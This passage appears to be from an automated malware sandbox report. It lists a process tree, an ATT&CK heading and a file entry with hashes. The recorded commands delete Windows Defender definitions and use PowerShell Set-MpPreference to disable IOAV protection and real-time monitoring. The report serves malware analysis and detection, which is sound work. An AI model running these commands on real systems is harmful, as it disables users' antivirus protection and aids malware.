      cmd: cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    [3] C:\Program Files\Windows Defender\MpCmdRun.exe (PID 1160)
        cmd: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        - Deletes Windows Defender Definitions

  [2] C:\Windows\system32\cmd.exe (PID 988)
      cmd: cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1812)
        cmd: powershell Set-MpPreference -DisableIOAVProtection $true
        - Suspicious behavior: EnumeratesProcesses

  [2] C:\Windows\system32\cmd.exe (PID 1712)
      cmd: cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1768)
        cmd: powershell Set-MpPreference -DisableRealtimeMonitoring $true
        - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v6
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: 518486dffec7d61e97730f9dc6c24aaa
SHA1: 6198cb33b781deec8a1e9b538a57b04704057343
SHA256: f109291c5abe9f0acd84f50f989803423c862aca638978f6b111b65d486abfba
SHA512: c5cb08510662c00356f75b396e186ed5da16e08c4ed34226531401fa22eff925ba2f92a559a73299df68b6631812a92c0a944bb958c3563db44e8e43d90462da